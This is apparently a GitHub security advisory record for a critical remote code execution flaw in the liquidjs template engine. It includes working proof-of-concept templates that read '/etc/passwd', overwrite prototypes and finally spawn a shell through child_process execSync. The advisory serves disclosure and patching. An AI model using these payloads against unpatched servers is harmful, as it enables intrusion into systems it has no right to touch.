{"id":"GHSA-gf2q-c269-pqgc","summary":"LiquidJS is Vulnerable to Remote Code Execution","details":"### Summary\nIt is possible to execute arbitrary code with crafted templates\n\n\n### Details\n\n\u003cdetails\u003e\n\u003csummary\u003e\n `1|valueOf` -\u003e `this` when evaluating the filter\n\n\n\u003c/summary\u003e\n\n```liquid\n{%assign r=1|valueOf%}\n{{r|inspect}}\n```\n\n```json\n{\"context\":{\"scopes\":[{\"r\":\"[Circular]\"}],\"registers\":{},\"breakCalled\":false,\"continueCalled\":false,\"sync\":false,\"opts\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null},\"globals\":{},\"environments\":{},\"strictVariables\":false,\"ownPropertyOnly\":true,\"memoryLimit\":{\"base\":0,\"message\":\"memory alloc limit exceeded\",\"limit\":null},\"renderLimit\":{\"base\":0,\"message\":\"template render limit exceeded\",\"limit\":null}},\"token\":{\"kind\":32,\"input\":\"{%assign r=1|valueOf%}\\n{{r|inspect}}\",\"begin\":13,\"end\":20,\"name\":\"valueOf\",\"args\":[]},\"liquid\":{\"renderer\":{},\"filters\":{\"raw\":{\"raw\":true}},\"tags\":{},\"options\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null},\"parser\":{\"liquid\":\"[Circular]\",\"fs\":{\"sep\":\"/\"},\"loader\":{\"options\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null}},\"parseLimit\":{\"base\":0,\"message\":\"parse length limit exceeded\",\"limit\":null}}}}\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\nfunction calls with a controlled first argument via comprable\n\n\u003c/summary\u003e\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nconst storeFn = (dst, src) =\u003e {\n  const parts = src.split(\".\");\n  const path = parts.slice(0, -1).join(\".\");\n  const prop = parts.at(-1);\n\n  return `\n{% assign _g = ${path}|group_by:\"0\"%}\n{% assign _gs = _g | where:n,\"${prop}\"|first%}\n{% assign ${dst} = _gs.items | first | last %}`;\n};\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first\nassign fs = r.liquid.options.fs\nassign n = \"name\"%}\n\n${storeFn(\"equals\", \"fs.readFileSync\")}\n${storeFn(\"gt\", \"fs.readFileSync\")}\n${storeFn(\"geq\", \"fs.readFileSync\")}\n${storeFn(\"lt\", \"fs.readFileSync\")}\n${storeFn(\"leq\", \"fs.readFileSync\")}\n\n{{m == \"/etc/passwd\"}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n\n\u003cimg width=\"1426\" height=\"717\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0618eb81-fb0d-4100-a6a0-556982decf8a\" /\u003e\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\u003csummary\u003echanging the prototype of things\u003c/summary\u003e\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nengine.registerFilter(\"log\", (val) =\u003e console.dir(val, { depth: 1 }));\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first %}\n\n{{m|log}}\n{% assign __proto__ = r.liquid.parser %}\n{{m|log}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n\u003cimg width=\"723\" height=\"211\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c05f4c4a-4151-4765-b569-3300ad837668\" /\u003e\n\n\u003c/details\u003e \n\nWhen calling functions via the comparable gadget, `this` will be the scope.\nBy overwriting `this.loader.lookup` and `this.readFile`, to fully control what goes into `this.parse`, and while controlling `this`, a reference to the `Function` constructor can be obtained, which then allows executing arbitrary code.\n\n```ts\n  private * _parseFile (file: string, sync?: boolean, type: LookupType = LookupType.Root, currentFile?: string): Generator\u003cunknown, Template[], string\u003e {\n    const filepath = yield this.loader.lookup(file, type, sync, currentFile)\n    return this.parse(yield this.readFile(!!sync, filepath), filepath)\n  }\n```\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nconst storeFn = (dst, src) =\u003e {\n  const parts = src.split(\".\");\n  const path = parts.slice(0, -1).join(\".\");\n  const prop = parts.at(-1);\n\n  return `\n{% assign _g = ${path}|group_by:\"0\"%}\n{% assign _gs = _g | where:n,\"${prop}\"|first%}\n{% assign ${dst} = _gs.items | first | last %}`;\n};\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first\nassign l = r.liquid\nassign p = l.parser\nassign f = l.filters\nassign n = \"name\"%}\n\n${storeFn(\"equals\", \"p.parseFile\")}\n${storeFn(\"gt\", \"p.parseFile\")}\n${storeFn(\"geq\", \"p.parseFile\")}\n${storeFn(\"lt\", \"p.parseFile\")}\n${storeFn(\"leq\", \"p.parseFile\")}\n\n${storeFn(\"readFile\", \"f.default\")}\n${storeFn(\"lookup\", \"f.raw.handler\")}\n\n{% assign loader = m %}\n{% assign context = m %}\n{% assign opts = m %}\n{% assign liquid = m %}\n{% assign options = m %}\n{% assign __proto__ = p %}\n\n{% assign tagDelimiterLeft = n %}\n{% assign tagDelimiterRight = n %}\n{% assign outputDelimiterLeft = '[' %}\n{% assign outputDelimiterRight = ']'%}\n\n{# set to some some function, so that filters['constructor'] -\u003e Function #}\n${storeFn(\"filters\", \"f.raw.handler\")} \n\n{# store Function #}\n{% assign output = m == \"[0|constructor]\" | first %}\n{% assign val = output.value.filters|first %}\n\n{# set scope.equals to Function #}\n${storeFn(\"equals\", \"val.handler\")}\n{% assign RCE = m == \"return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})\" %}\n{{RCE}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nRemote Code Execution.","aliases":["CVE-2026-45618"],"modified":"2026-09-10T03:51:05.650312328Z","published":"2026-05-27T18:24:14Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-05-27T18:24:14Z","nvd_published_at":null,"cwe_ids":["CWE-94"],"severity":"CRITICAL"},"references":[{"type":"WEB","url":"https://github.com/harttle/liquidjs/security/advisories/GHSA-gf2q-c269-pqgc"},{"type":"PACKAGE","url":"https://github.com/harttle/liquidjs"},{"type":"WEB","url":"https://github.com/harttle/liquidjs/releases/tag/v10.26.0"}],"affected":[{"package":{"name":"liquidjs","ecosystem":"npm","purl":"pkg:npm/liquidjs"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"10.26.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gf2q-c269-pqgc/GHSA-gf2q-c269-pqgc.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}